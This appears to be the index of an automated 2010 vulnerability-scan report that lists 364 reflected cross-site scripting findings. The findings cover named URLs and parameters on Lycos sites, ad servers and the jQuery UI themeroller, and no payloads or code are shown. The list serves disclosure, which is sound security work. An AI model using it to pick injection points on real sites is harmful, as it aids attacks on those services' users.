Lycos.com, XSS, Cross Site Scripting, CAPEC-86, CWE-79


Proof of Concept, XSS, Example | Vulnerability Crawler

Report generated by XSS.CX at Sun Dec 12 09:23:00 CST 2010.


Lycos Web Properties Example Vulnerability Report

1. Cross-site scripting (reflected)

1.1. http://a.collective-media.net/ad/cm.idg_b2c/ [REST URL parameter 1]

1.2. http://a.collective-media.net/ad/idgt.lycos/ [REST URL parameter 1]

1.3. http://a.collective-media.net/adj/cm.idg_b2c/ [REST URL parameter 2]

1.4. http://a.collective-media.net/adj/cm.idg_b2c/ [name of an arbitrarily supplied request parameter]

1.5. http://a.collective-media.net/adj/cm.idg_b2c/ [sz parameter]

1.6. http://a.collective-media.net/adj/idgt.lycos/ [REST URL parameter 2]

1.7. http://a.collective-media.net/adj/idgt.lycos/ [name of an arbitrarily supplied request parameter]

1.8. http://a.collective-media.net/adj/idgt.lycos/ [tile parameter]

1.9. http://a.collective-media.net/cmadj/idgt.lycos/ [REST URL parameter 1]

1.10. http://a.collective-media.net/cmadj/idgt.lycos/ [REST URL parameter 2]

1.11. http://a.collective-media.net/cmadj/idgt.lycos/ [name of an arbitrarily supplied request parameter]

1.12. http://a.collective-media.net/cmadj/idgt.lycos/ [tile parameter]

1.13. http://advertising.lycos.com/ [cat parameter]

1.14. http://advertising.lycos.com/ [tab parameter]

1.15. http://blog.gamesville.com/ [name of an arbitrarily supplied request parameter]

1.16. http://blog.gamesville.com/3047/win-a-new-laptop-this-month-at-gamesville-com [name of an arbitrarily supplied request parameter]

1.17. http://blog.gamesville.com/3047/win-a-new-laptop-this-month-at-gamesville-com/comment-page-1 [REST URL parameter 3]

1.18. http://blog.gamesville.com/3047/win-a-new-laptop-this-month-at-gamesville-com/comment-page-1 [name of an arbitrarily supplied request parameter]

1.19. http://blog.gamesville.com/3110/snakes-on-a-plane-pfft-meet-goats-on-a-dam/comment-page-1 [REST URL parameter 3]

1.20. http://blog.gamesville.com/3110/snakes-on-a-plane-pfft-meet-goats-on-a-dam/comment-page-1 [name of an arbitrarily supplied request parameter]

1.21. http://blog.gamesville.com/3114/lmtrtr-of-milwaukee-wi-wins-1443-playing-three-eyed-bingo-on-gamesville/comment-page-1 [REST URL parameter 3]

1.22. http://blog.gamesville.com/3114/lmtrtr-of-milwaukee-wi-wins-1443-playing-three-eyed-bingo-on-gamesville/comment-page-1 [name of an arbitrarily supplied request parameter]

1.23. http://classifieds.lycos.com/ [name of an arbitrarily supplied request parameter]

1.24. http://dealnews.com/lw/artclick.html [REST URL parameter 1]

1.25. http://dealnews.com/lw/artclick.html [REST URL parameter 1]

1.26. http://deals.lycos.com/coupons [name of an arbitrarily supplied request parameter]

1.27. http://deals.lycos.com/deals [name of an arbitrarily supplied request parameter]

1.28. http://deals.lycos.com/deals/category/automotive-238 [name of an arbitrarily supplied request parameter]

1.29. http://deals.lycos.com/deals/category/cameras-167 [name of an arbitrarily supplied request parameter]

1.30. http://deals.lycos.com/deals/category/clothing-and-accessories-202 [name of an arbitrarily supplied request parameter]

1.31. http://deals.lycos.com/deals/category/computer-39 [name of an arbitrarily supplied request parameter]

1.32. http://deals.lycos.com/deals/category/digital-cameras-168 [name of an arbitrarily supplied request parameter]

1.33. http://deals.lycos.com/deals/category/electronics-142 [name of an arbitrarily supplied request parameter]

1.34. http://deals.lycos.com/deals/category/gaming-and-toys-186 [name of an arbitrarily supplied request parameter]

1.35. http://deals.lycos.com/deals/category/health-and-beauty-228 [name of an arbitrarily supplied request parameter]

1.36. http://deals.lycos.com/deals/category/home-and-garden-196 [name of an arbitrarily supplied request parameter]

1.37. http://deals.lycos.com/deals/category/lcd-tvs-424 [name of an arbitrarily supplied request parameter]

1.38. http://deals.lycos.com/deals/category/movies-music-books-178 [name of an arbitrarily supplied request parameter]

1.39. http://deals.lycos.com/deals/category/mp3-players-144 [name of an arbitrarily supplied request parameter]

1.40. http://deals.lycos.com/deals/category/office-and-supplies-182 [name of an arbitrarily supplied request parameter]

1.41. http://deals.lycos.com/deals/category/pc-computers-47 [name of an arbitrarily supplied request parameter]

1.42. http://deals.lycos.com/deals/category/sports-and-fitness-211 [name of an arbitrarily supplied request parameter]

1.43. http://deals.lycos.com/deals/category/televisions-159 [name of an arbitrarily supplied request parameter]

1.44. http://deals.lycos.com/deals/category/travel-and-entertainment-206 [name of an arbitrarily supplied request parameter]

1.45. http://deals.lycos.com/deals/stores/best-buy-560 [name of an arbitrarily supplied request parameter]

1.46. http://deals.lycos.com/deals/stores/buy-com-233 [name of an arbitrarily supplied request parameter]

1.47. http://deals.lycos.com/deals/stores/dell-home-638 [name of an arbitrarily supplied request parameter]

1.48. http://deals.lycos.com/deals/stores/ebay-50 [name of an arbitrarily supplied request parameter]

1.49. http://deals.lycos.com/deals/stores/itunes-music-store-1414 [name of an arbitrarily supplied request parameter]

1.50. http://deals.lycos.com/deals/stores/walmart-321 [name of an arbitrarily supplied request parameter]

1.51. http://ib.adnxs.com/ptj [redir parameter]

1.52. http://info.lycos.com/ [cat parameter]

1.53. http://info.lycos.com/ [tab parameter]

1.54. http://info.lycos.com/tos.php [name of an arbitrarily supplied request parameter]

1.55. http://jobs.lycos.com/search [name of an arbitrarily supplied request parameter]

1.56. http://jobs.lycos.com/search [x parameter]

1.57. http://jqueryui.com/themeroller/ [bgColorActive parameter]

1.58. http://jqueryui.com/themeroller/ [bgColorContent parameter]

1.59. http://jqueryui.com/themeroller/ [bgColorDefault parameter]

1.60. http://jqueryui.com/themeroller/ [bgColorError parameter]

1.61. http://jqueryui.com/themeroller/ [bgColorHeader parameter]

1.62. http://jqueryui.com/themeroller/ [bgColorHighlight parameter]

1.63. http://jqueryui.com/themeroller/ [bgColorHover parameter]

1.64. http://jqueryui.com/themeroller/ [bgColorOverlay parameter]

1.65. http://jqueryui.com/themeroller/ [bgColorShadow parameter]

1.66. http://jqueryui.com/themeroller/ [bgImgOpacityActive parameter]

1.67. http://jqueryui.com/themeroller/ [bgImgOpacityContent parameter]

1.68. http://jqueryui.com/themeroller/ [bgImgOpacityDefault parameter]

1.69. http://jqueryui.com/themeroller/ [bgImgOpacityError parameter]

1.70. http://jqueryui.com/themeroller/ [bgImgOpacityHeader parameter]

1.71. http://jqueryui.com/themeroller/ [bgImgOpacityHighlight parameter]

1.72. http://jqueryui.com/themeroller/ [bgImgOpacityHover parameter]

1.73. http://jqueryui.com/themeroller/ [bgImgOpacityOverlay parameter]

1.74. http://jqueryui.com/themeroller/ [bgImgOpacityShadow parameter]

1.75. http://jqueryui.com/themeroller/ [bgTextureActive parameter]

1.76. http://jqueryui.com/themeroller/ [bgTextureContent parameter]

1.77. http://jqueryui.com/themeroller/ [bgTextureDefault parameter]

1.78. http://jqueryui.com/themeroller/ [bgTextureError parameter]

1.79. http://jqueryui.com/themeroller/ [bgTextureHeader parameter]

1.80. http://jqueryui.com/themeroller/ [bgTextureHighlight parameter]

1.81. http://jqueryui.com/themeroller/ [bgTextureHover parameter]

1.82. http://jqueryui.com/themeroller/ [bgTextureOverlay parameter]

1.83. http://jqueryui.com/themeroller/ [bgTextureShadow parameter]

1.84. http://jqueryui.com/themeroller/ [borderColorActive parameter]

1.85. http://jqueryui.com/themeroller/ [borderColorContent parameter]

1.86. http://jqueryui.com/themeroller/ [borderColorDefault parameter]

1.87. http://jqueryui.com/themeroller/ [borderColorError parameter]

1.88. http://jqueryui.com/themeroller/ [borderColorHeader parameter]

1.89. http://jqueryui.com/themeroller/ [borderColorHighlight parameter]

1.90. http://jqueryui.com/themeroller/ [borderColorHover parameter]

1.91. http://jqueryui.com/themeroller/ [cornerRadius parameter]

1.92. http://jqueryui.com/themeroller/ [cornerRadiusShadow parameter]

1.93. http://jqueryui.com/themeroller/ [fcActive parameter]

1.94. http://jqueryui.com/themeroller/ [fcContent parameter]

1.95. http://jqueryui.com/themeroller/ [fcDefault parameter]

1.96. http://jqueryui.com/themeroller/ [fcError parameter]

1.97. http://jqueryui.com/themeroller/ [fcHeader parameter]

1.98. http://jqueryui.com/themeroller/ [fcHighlight parameter]

1.99. http://jqueryui.com/themeroller/ [fcHover parameter]

1.100. http://jqueryui.com/themeroller/ [ffDefault parameter]

1.101. http://jqueryui.com/themeroller/ [fsDefault parameter]

1.102. http://jqueryui.com/themeroller/ [fwDefault parameter]

1.103. http://jqueryui.com/themeroller/ [iconColorActive parameter]

1.104. http://jqueryui.com/themeroller/ [iconColorContent parameter]

1.105. http://jqueryui.com/themeroller/ [iconColorDefault parameter]

1.106. http://jqueryui.com/themeroller/ [iconColorError parameter]

1.107. http://jqueryui.com/themeroller/ [iconColorHeader parameter]

1.108. http://jqueryui.com/themeroller/ [iconColorHighlight parameter]

1.109. http://jqueryui.com/themeroller/ [iconColorHover parameter]

1.110. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]

1.111. http://jqueryui.com/themeroller/ [offsetLeftShadow parameter]

1.112. http://jqueryui.com/themeroller/ [offsetTopShadow parameter]

1.113. http://jqueryui.com/themeroller/ [opacityOverlay parameter]

1.114. http://jqueryui.com/themeroller/ [opacityShadow parameter]

1.115. http://jqueryui.com/themeroller/ [thicknessShadow parameter]

1.116. http://k.collective-media.net/cmadj/cm.idg_b2c/ [REST URL parameter 2]

1.117. http://k.collective-media.net/cmadj/cm.idg_b2c/ [sz parameter]

1.118. http://peoplesearch.lycos.com/ [name of an arbitrarily supplied request parameter]

1.119. http://peoplesearch.lycos.com/ [search-type parameter]

1.120. http://peoplesearch.lycos.com/ [tab parameter]

1.121. http://peoplesearch.lycos.com/index.php [name of an arbitrarily supplied request parameter]

1.122. http://registration.lycos.com/forgot.php [name of an arbitrarily supplied request parameter]

1.123. http://search.lycos.com/ [cat parameter]

1.124. http://search.lycos.com/ [cat parameter]

1.125. http://search.lycos.com/ [mobile parameter]

1.126. http://search.lycos.com/ [name of an arbitrarily supplied request parameter]

1.127. http://search.lycos.com/ [query parameter]

1.128. http://search.lycos.com/ [query parameter]

1.129. http://search.lycos.com/ [src parameter]

1.130. http://search.lycos.com/ [tab parameter]

1.131. http://search.lycos.com/ [x parameter]

1.132. http://search.lycos.com/ [y parameter]

1.133. http://search.lycos.com/image/ [cat parameter]

1.134. http://search.lycos.com/image/ [cat parameter]

1.135. http://search.lycos.com/image/ [name of an arbitrarily supplied request parameter]

1.136. http://search.lycos.com/image/ [tab parameter]

1.137. http://search.lycos.com/video/ [cat parameter]

1.138. http://search.lycos.com/video/ [cat parameter]

1.139. http://search.lycos.com/video/ [name of an arbitrarily supplied request parameter]

1.140. http://search.lycos.com/video/ [tab parameter]

1.141. http://advertising.lycos.com/ [diktfc cookie]

1.142. http://advertising.lycos.com/ [diktfc cookie]

1.143. http://advertising.lycos.com/bootstrap.js [diktfc cookie]

1.144. http://advertising.lycos.com/bootstrap.js [diktfc cookie]

1.145. http://advertising.lycos.com/contactus.html [diktfc cookie]

1.146. http://advertising.lycos.com/contactus.html [diktfc cookie]

1.147. http://advertising.lycos.com/lycos.xml [diktfc cookie]

1.148. http://advertising.lycos.com/lycos.xml [diktfc cookie]

1.149. http://deals.lycos.com/ [diktfc cookie]

1.150. http://deals.lycos.com/ [diktfc cookie]

1.151. http://deals.lycos.com/bootstrap.js [diktfc cookie]

1.152. http://deals.lycos.com/bootstrap.js [diktfc cookie]

1.153. http://deals.lycos.com/coupons [diktfc cookie]

1.154. http://deals.lycos.com/coupons [diktfc cookie]

1.155. http://deals.lycos.com/coupons/stores [diktfc cookie]

1.156. http://deals.lycos.com/coupons/stores [diktfc cookie]

1.157. http://deals.lycos.com/deal/93-off-iphone-4-cases-at-hhi-extra-20-off-413441 [diktfc cookie]

1.158. http://deals.lycos.com/deal/93-off-iphone-4-cases-at-hhi-extra-20-off-413441 [diktfc cookie]

1.159. http://deals.lycos.com/deal/canon-eos-60d-18mp-dslr-body-899-413793 [diktfc cookie]

1.160. http://deals.lycos.com/deal/canon-eos-60d-18mp-dslr-body-899-413793 [diktfc cookie]

1.161. http://deals.lycos.com/deal/casio-ex-fh20-9-1mp-digital-camera-for-200-414612 [diktfc cookie]

1.162. http://deals.lycos.com/deal/casio-ex-fh20-9-1mp-digital-camera-for-200-414612 [diktfc cookie]

1.163. http://deals.lycos.com/deal/cut-the-rope-holiday-gift-for-iphone-for-free-414306 [diktfc cookie]

1.164. http://deals.lycos.com/deal/cut-the-rope-holiday-gift-for-iphone-for-free-414306 [diktfc cookie]

1.165. http://deals.lycos.com/deal/dell-core-2-duo-2-9ghz-pc-24-lcd-469-414699 [diktfc cookie]

1.166. http://deals.lycos.com/deal/dell-core-2-duo-2-9ghz-pc-24-lcd-469-414699 [diktfc cookie]

1.167. http://deals.lycos.com/deal/dell-financial-services-25-off-laptops-more-414325 [diktfc cookie]

1.168. http://deals.lycos.com/deal/dell-financial-services-25-off-laptops-more-414325 [diktfc cookie]

1.169. http://deals.lycos.com/deal/dell-i5-dual-2-53ghz-14-laptop-bundle-900-414537 [diktfc cookie]

1.170. http://deals.lycos.com/deal/dell-i5-dual-2-53ghz-14-laptop-bundle-900-414537 [diktfc cookie]

1.171. http://deals.lycos.com/deal/dell-i7-quad-2-93ghz-pc-22-lcd-910-414367 [diktfc cookie]

1.172. http://deals.lycos.com/deal/dell-i7-quad-2-93ghz-pc-22-lcd-910-414367 [diktfc cookie]

1.173. http://deals.lycos.com/deal/dell-vostro-core-2-duo-2-1ghz-16-laptop-409-414353 [diktfc cookie]

1.174. http://deals.lycos.com/deal/dell-vostro-core-2-duo-2-1ghz-16-laptop-409-414353 [diktfc cookie]

1.175. http://deals.lycos.com/deal/digital-blue-carabiner-digital-camera-for-3-413838 [diktfc cookie]

1.176. http://deals.lycos.com/deal/digital-blue-carabiner-digital-camera-for-3-413838 [diktfc cookie]

1.177. http://deals.lycos.com/deal/drawn-the-painted-tower-for-ipad-for-5-414364 [diktfc cookie]

1.178. http://deals.lycos.com/deal/drawn-the-painted-tower-for-ipad-for-5-414364 [diktfc cookie]

1.179. http://deals.lycos.com/deal/element-40-1080p-lcd-hdtv-350-414616 [diktfc cookie]

1.180. http://deals.lycos.com/deal/element-40-1080p-lcd-hdtv-350-414616 [diktfc cookie]

1.181. http://deals.lycos.com/deal/finepix-ax250-14mp-digicam-bundle-for-89-413481 [diktfc cookie]

1.182. http://deals.lycos.com/deal/finepix-ax250-14mp-digicam-bundle-for-89-413481 [diktfc cookie]

1.183. http://deals.lycos.com/deal/flip-slidehd-720p-16gb-digital-camcorder-130-414368 [diktfc cookie]

1.184. http://deals.lycos.com/deal/flip-slidehd-720p-16gb-digital-camcorder-130-414368 [diktfc cookie]

1.185. http://deals.lycos.com/deal/free-iphone-applications-413656 [diktfc cookie]

1.186. http://deals.lycos.com/deal/free-iphone-applications-413656 [diktfc cookie]

1.187. http://deals.lycos.com/deal/hp-home-coupons-up-to-400-off-414278 [diktfc cookie]

1.188. http://deals.lycos.com/deal/hp-home-coupons-up-to-400-off-414278 [diktfc cookie]

1.189. http://deals.lycos.com/deal/iphone-app-price-cuts-deals-from-1-414092 [diktfc cookie]

1.190. http://deals.lycos.com/deal/iphone-app-price-cuts-deals-from-1-414092 [diktfc cookie]

1.191. http://deals.lycos.com/deal/kempler-and-strauss-watch-cell-phone-175-413939 [diktfc cookie]

1.192. http://deals.lycos.com/deal/kempler-and-strauss-watch-cell-phone-175-413939 [diktfc cookie]

1.193. http://deals.lycos.com/deal/keydex-stand-for-ipad-ebook-reader-for-14-413522 [diktfc cookie]

1.194. http://deals.lycos.com/deal/keydex-stand-for-ipad-ebook-reader-for-14-413522 [diktfc cookie]

1.195. http://deals.lycos.com/deal/kodak-zi8-1080p-sdhc-digital-camcorder-80-414390 [diktfc cookie]

1.196. http://deals.lycos.com/deal/kodak-zi8-1080p-sdhc-digital-camcorder-80-414390 [diktfc cookie]

1.197. http://deals.lycos.com/deal/lenovo-amd-dual-core-1-6ghz-aio-20-pc-499-414294 [diktfc cookie]

1.198. http://deals.lycos.com/deal/lenovo-amd-dual-core-1-6ghz-aio-20-pc-499-414294 [diktfc cookie]

1.199. http://deals.lycos.com/deal/lenovo-core-i3-dual-2-4ghz-14-laptop-549-414298 [diktfc cookie]

1.200. http://deals.lycos.com/deal/lenovo-core-i3-dual-2-4ghz-14-laptop-549-414298 [diktfc cookie]

1.201. http://deals.lycos.com/deal/lenovo-core-i5-dual-2-53ghz-16-for-599-414281 [diktfc cookie]

1.202. http://deals.lycos.com/deal/lenovo-core-i5-dual-2-53ghz-16-for-599-414281 [diktfc cookie]

1.203. http://deals.lycos.com/deal/lenovo-i5-dual-1-33ghz-12-laptop-599-414318 [diktfc cookie]

1.204. http://deals.lycos.com/deal/lenovo-i5-dual-1-33ghz-12-laptop-599-414318 [diktfc cookie]

1.205. http://deals.lycos.com/deal/lg-32-1080p-lcd-hdtv-for-399-414373 [diktfc cookie]

1.206. http://deals.lycos.com/deal/lg-32-1080p-lcd-hdtv-for-399-414373 [diktfc cookie]

1.207. http://deals.lycos.com/deal/lg-42-1080p-lcd-hdtv-for-479-414598 [diktfc cookie]

1.208. http://deals.lycos.com/deal/lg-42-1080p-lcd-hdtv-for-479-414598 [diktfc cookie]

1.209. http://deals.lycos.com/deal/logmein-ignition-for-iphone-for-20-413418 [diktfc cookie]

1.210. http://deals.lycos.com/deal/logmein-ignition-for-iphone-for-20-413418 [diktfc cookie]

1.211. http://deals.lycos.com/deal/mirror-s-edge-for-iphone-for-1-414300 [diktfc cookie]

1.212. http://deals.lycos.com/deal/mirror-s-edge-for-iphone-for-1-414300 [diktfc cookie]

1.213. http://deals.lycos.com/deal/mogo-talk-bluetooth-headset-for-iphone-20-413971 [diktfc cookie]

1.214. http://deals.lycos.com/deal/mogo-talk-bluetooth-headset-for-iphone-20-413971 [diktfc cookie]

1.215. http://deals.lycos.com/deal/nikon-d3000-10mp-dslr-w-lens-for-499-414265 [diktfc cookie]

1.216. http://deals.lycos.com/deal/nikon-d3000-10mp-dslr-w-lens-for-499-414265 [diktfc cookie]

1.217. http://deals.lycos.com/deal/nokia-2330-gophone-prepaid-for-at-and-t-for-5-413495 [diktfc cookie]

1.218. http://deals.lycos.com/deal/nokia-2330-gophone-prepaid-for-at-and-t-for-5-413495 [diktfc cookie]

1.219. http://deals.lycos.com/deal/nokia-2720-prepaid-cell-phone-for-6-413497 [diktfc cookie]

1.220. http://deals.lycos.com/deal/nokia-2720-prepaid-cell-phone-for-6-413497 [diktfc cookie]

1.221. http://deals.lycos.com/deal/panasonic-58-1080p-plasma-hdtv-1-100-414276 [diktfc cookie]

1.222. http://deals.lycos.com/deal/panasonic-58-1080p-plasma-hdtv-1-100-414276 [diktfc cookie]

1.223. http://deals.lycos.com/deal/panasonic-58-1080p-plasma-w-tivo-1-228-414295 [diktfc cookie]

1.224. http://deals.lycos.com/deal/panasonic-58-1080p-plasma-w-tivo-1-228-414295 [diktfc cookie]

1.225. http://deals.lycos.com/deal/panasonic-dmc-zs6-12mp-camera-for-150-414700 [diktfc cookie]

1.226. http://deals.lycos.com/deal/panasonic-dmc-zs6-12mp-camera-for-150-414700 [diktfc cookie]

1.227. http://deals.lycos.com/deal/polaroid-dvf-720sc-sd-card-camcorder-50-414348 [diktfc cookie]

1.228. http://deals.lycos.com/deal/polaroid-dvf-720sc-sd-card-camcorder-50-414348 [diktfc cookie]

1.229. http://deals.lycos.com/deal/samsung-32-720p-lcd-hdtv-for-330-414355 [diktfc cookie]

1.230. http://deals.lycos.com/deal/samsung-32-720p-lcd-hdtv-for-330-414355 [diktfc cookie]

1.231. http://deals.lycos.com/deal/samsung-55-3d-ready-hdtv-w-3d-kit-2-099-414388 [diktfc cookie]

1.232. http://deals.lycos.com/deal/samsung-55-3d-ready-hdtv-w-3d-kit-2-099-414388 [diktfc cookie]

1.233. http://deals.lycos.com/deal/samsung-nx10-15mp-dslr-camera-lens-423-413374 [diktfc cookie]

1.234. http://deals.lycos.com/deal/samsung-nx10-15mp-dslr-camera-lens-423-413374 [diktfc cookie]

1.235. http://deals.lycos.com/deal/samsung-sunburst-a697-cell-phone-50-414188 [diktfc cookie]

1.236. http://deals.lycos.com/deal/samsung-sunburst-a697-cell-phone-50-414188 [diktfc cookie]

1.237. http://deals.lycos.com/deal/sharp-55-120hz-1080p-led-hdtv-1-200-414377 [diktfc cookie]

1.238. http://deals.lycos.com/deal/sharp-55-120hz-1080p-led-hdtv-1-200-414377 [diktfc cookie]

1.239. http://deals.lycos.com/deal/sharp-aquos-40-120hz-lcd-hdtv-blu-ray-699-414299 [diktfc cookie]

1.240. http://deals.lycos.com/deal/sharp-aquos-40-120hz-lcd-hdtv-blu-ray-699-414299 [diktfc cookie]

1.241. http://deals.lycos.com/deal/sharp-aquos-52-1080p-lcd-hdtv-950-414587 [diktfc cookie]

1.242. http://deals.lycos.com/deal/sharp-aquos-52-1080p-lcd-hdtv-950-414587 [diktfc cookie]

1.243. http://deals.lycos.com/deal/sony-14mp-nex-5-dslr-w-lens-654-413823 [diktfc cookie]

1.244. http://deals.lycos.com/deal/sony-14mp-nex-5-dslr-w-lens-654-413823 [diktfc cookie]

1.245. http://deals.lycos.com/deal/toshiba-40-1080p-lcd-hdtv-for-450-414283 [diktfc cookie]

1.246. http://deals.lycos.com/deal/toshiba-40-1080p-lcd-hdtv-for-450-414283 [diktfc cookie]

1.247. http://deals.lycos.com/deal/toshiba-camileo-1080p-digital-camcorder-89-414580 [diktfc cookie]

1.248. http://deals.lycos.com/deal/toshiba-camileo-1080p-digital-camcorder-89-414580 [diktfc cookie]

1.249. http://deals.lycos.com/deal/unlocked-mytouch-4g-smartphone-for-440-414260 [diktfc cookie]

1.250. http://deals.lycos.com/deal/unlocked-mytouch-4g-smartphone-for-440-414260 [diktfc cookie]

1.251. http://deals.lycos.com/deal/viore-24-1080p-lcd-hdtv-for-199-414568 [diktfc cookie]

1.252. http://deals.lycos.com/deal/viore-24-1080p-lcd-hdtv-for-199-414568 [diktfc cookie]

1.253. http://deals.lycos.com/deals [diktfc cookie]

1.254. http://deals.lycos.com/deals [diktfc cookie]

1.255. http://deals.lycos.com/deals/category/automotive-238 [diktfc cookie]

1.256. http://deals.lycos.com/deals/category/automotive-238 [diktfc cookie]

1.257. http://deals.lycos.com/deals/category/babies-and-kids-224 [diktfc cookie]

1.258. http://deals.lycos.com/deals/category/babies-and-kids-224 [diktfc cookie]

1.259. http://deals.lycos.com/deals/category/cameras-167 [diktfc cookie]

1.260. http://deals.lycos.com/deals/category/cameras-167 [diktfc cookie]

1.261. http://deals.lycos.com/deals/category/cell-phones-174 [diktfc cookie]

1.262. http://deals.lycos.com/deals/category/cell-phones-174 [diktfc cookie]

1.263. http://deals.lycos.com/deals/category/clothing-and-accessories-202 [diktfc cookie]

1.264. http://deals.lycos.com/deals/category/clothing-and-accessories-202 [diktfc cookie]

1.265. http://deals.lycos.com/deals/category/computer-39 [diktfc cookie]

1.266. http://deals.lycos.com/deals/category/computer-39 [diktfc cookie]

1.267. http://deals.lycos.com/deals/category/dating-services-445 [diktfc cookie]

1.268. http://deals.lycos.com/deals/category/dating-services-445 [diktfc cookie]

1.269. http://deals.lycos.com/deals/category/digital-cameras-168 [diktfc cookie]

1.270. http://deals.lycos.com/deals/category/digital-cameras-168 [diktfc cookie]

1.271. http://deals.lycos.com/deals/category/electronics-142 [diktfc cookie]

1.272. http://deals.lycos.com/deals/category/electronics-142 [diktfc cookie]

1.273. http://deals.lycos.com/deals/category/financial-services-439 [diktfc cookie]

1.274. http://deals.lycos.com/deals/category/financial-services-439 [diktfc cookie]

1.275. http://deals.lycos.com/deals/category/food-and-drink-213 [diktfc cookie]

1.276. http://deals.lycos.com/deals/category/food-and-drink-213 [diktfc cookie]

1.277. http://deals.lycos.com/deals/category/gaming-and-toys-186 [diktfc cookie]

1.278. http://deals.lycos.com/deals/category/gaming-and-toys-186 [diktfc cookie]

1.279. http://deals.lycos.com/deals/category/gifts-flowers-and-cards-218 [diktfc cookie]

1.280. http://deals.lycos.com/deals/category/gifts-flowers-and-cards-218 [diktfc cookie]

1.281. http://deals.lycos.com/deals/category/health-and-beauty-228 [diktfc cookie]

1.282. http://deals.lycos.com/deals/category/health-and-beauty-228 [diktfc cookie]

1.283. http://deals.lycos.com/deals/category/home-and-garden-196 [diktfc cookie]

1.284. http://deals.lycos.com/deals/category/home-and-garden-196 [diktfc cookie]

1.285. http://deals.lycos.com/deals/category/lcd-tvs-424 [diktfc cookie]

1.286. http://deals.lycos.com/deals/category/lcd-tvs-424 [diktfc cookie]

1.287. http://deals.lycos.com/deals/category/movies-music-books-178 [diktfc cookie]

1.288. http://deals.lycos.com/deals/category/movies-music-books-178 [diktfc cookie]

1.289. http://deals.lycos.com/deals/category/mp3-players-144 [diktfc cookie]

1.290. http://deals.lycos.com/deals/category/mp3-players-144 [diktfc cookie]

1.291. http://deals.lycos.com/deals/category/office-and-supplies-182 [diktfc cookie]

1.292. http://deals.lycos.com/deals/category/office-and-supplies-182 [diktfc cookie]

1.293. http://deals.lycos.com/deals/category/pc-computers-47 [diktfc cookie]

1.294. http://deals.lycos.com/deals/category/pc-computers-47 [diktfc cookie]

1.295. http://deals.lycos.com/deals/category/pets-221 [diktfc cookie]

1.296. http://deals.lycos.com/deals/category/pets-221 [diktfc cookie]

1.297. http://deals.lycos.com/deals/category/sports-and-fitness-211 [diktfc cookie]

1.298. http://deals.lycos.com/deals/category/sports-and-fitness-211 [diktfc cookie]

1.299. http://deals.lycos.com/deals/category/televisions-159 [diktfc cookie]

1.300. http://deals.lycos.com/deals/category/televisions-159 [diktfc cookie]

1.301. http://deals.lycos.com/deals/category/travel-and-entertainment-206 [diktfc cookie]

1.302. http://deals.lycos.com/deals/category/travel-and-entertainment-206 [diktfc cookie]

1.303. http://deals.lycos.com/deals/stores [diktfc cookie]

1.304. http://deals.lycos.com/deals/stores [diktfc cookie]

1.305. http://deals.lycos.com/deals/stores/6pm-1460 [diktfc cookie]

1.306. http://deals.lycos.com/deals/stores/6pm-1460 [diktfc cookie]

1.307. http://deals.lycos.com/deals/stores/best-buy-560 [diktfc cookie]

1.308. http://deals.lycos.com/deals/stores/best-buy-560 [diktfc cookie]

1.309. http://deals.lycos.com/deals/stores/buy-com-233 [diktfc cookie]

1.310. http://deals.lycos.com/deals/stores/buy-com-233 [diktfc cookie]

1.311. http://deals.lycos.com/deals/stores/dell-home-638 [diktfc cookie]

1.312. http://deals.lycos.com/deals/stores/dell-home-638 [diktfc cookie]

1.313. http://deals.lycos.com/deals/stores/ebay-50 [diktfc cookie]

1.314. http://deals.lycos.com/deals/stores/ebay-50 [diktfc cookie]

1.315. http://deals.lycos.com/deals/stores/itunes-music-store-1414 [diktfc cookie]

1.316. http://deals.lycos.com/deals/stores/itunes-music-store-1414 [diktfc cookie]

1.317. http://deals.lycos.com/deals/stores/jcpenney-320 [diktfc cookie]

1.318. http://deals.lycos.com/deals/stores/jcpenney-320 [diktfc cookie]

1.319. http://deals.lycos.com/deals/stores/kohls-1009 [diktfc cookie]

1.320. http://deals.lycos.com/deals/stores/kohls-1009 [diktfc cookie]

1.321. http://deals.lycos.com/deals/stores/sony-style-716 [diktfc cookie]

1.322. http://deals.lycos.com/deals/stores/sony-style-716 [diktfc cookie]

1.323. http://deals.lycos.com/deals/stores/walmart-321 [diktfc cookie]

1.324. http://deals.lycos.com/deals/stores/walmart-321 [diktfc cookie]

1.325. http://deals.lycos.com/search [diktfc cookie]

1.326. http://deals.lycos.com/search [diktfc cookie]

1.327. http://deals.lycos.com/sitemap [diktfc cookie]

1.328. http://deals.lycos.com/sitemap [diktfc cookie]

1.329. http://info.lycos.com/ [diktfc cookie]

1.330. http://info.lycos.com/ [diktfc cookie]

1.331. http://info.lycos.com/bootstrap.js [diktfc cookie]

1.332. http://info.lycos.com/bootstrap.js [diktfc cookie]

1.333. http://info.lycos.com/contact.php [diktfc cookie]

1.334. http://info.lycos.com/contact.php [diktfc cookie]

1.335. http://info.lycos.com/copyright.php [diktfc cookie]

1.336. http://info.lycos.com/copyright.php [diktfc cookie]

1.337. http://info.lycos.com/jobs.php [diktfc cookie]

1.338. http://info.lycos.com/jobs.php [diktfc cookie]

1.339. http://info.lycos.com/legal/legal.asp [diktfc cookie]

1.340. http://info.lycos.com/legal/legal.asp [diktfc cookie]

1.341. http://info.lycos.com/legal/sectoolbar.html [diktfc cookie]

1.342. http://info.lycos.com/legal/sectoolbar.html [diktfc cookie]

1.343. http://info.lycos.com/life.php [diktfc cookie]

1.344. http://info.lycos.com/life.php [diktfc cookie]

1.345. http://info.lycos.com/overview.php [diktfc cookie]

1.346. http://info.lycos.com/overview.php [diktfc cookie]

1.347. http://info.lycos.com/privacy.php [diktfc cookie]

1.348. http://info.lycos.com/privacy.php [diktfc cookie]

1.349. http://info.lycos.com/privacy/privacy.asp [diktfc cookie]

1.350. http://info.lycos.com/privacy/privacy.asp [diktfc cookie]

1.351. http://info.lycos.com/safety.php [diktfc cookie]

1.352. http://info.lycos.com/safety.php [diktfc cookie]

1.353. http://info.lycos.com/tos-mail.php [diktfc cookie]

1.354. http://info.lycos.com/tos-mail.php [diktfc cookie]

1.355. http://info.lycos.com/tos-po.php [diktfc cookie]

1.356. http://info.lycos.com/tos-po.php [diktfc cookie]

1.357. http://info.lycos.com/tos-subs.php [diktfc cookie]

1.358. http://info.lycos.com/tos-subs.php [diktfc cookie]

1.359. http://info.lycos.com/tos-tm.php [diktfc cookie]

1.360. http://info.lycos.com/tos-tm.php [diktfc cookie]

1.361. http://info.lycos.com/tos.php [diktfc cookie]

1.362. http://info.lycos.com/tos.php [diktfc cookie]

1.363. http://peoplesearch.lycos.com/ [diktfc cookie]

1.364. http://peoplesearch.lycos.com/ [diktfc cookie]

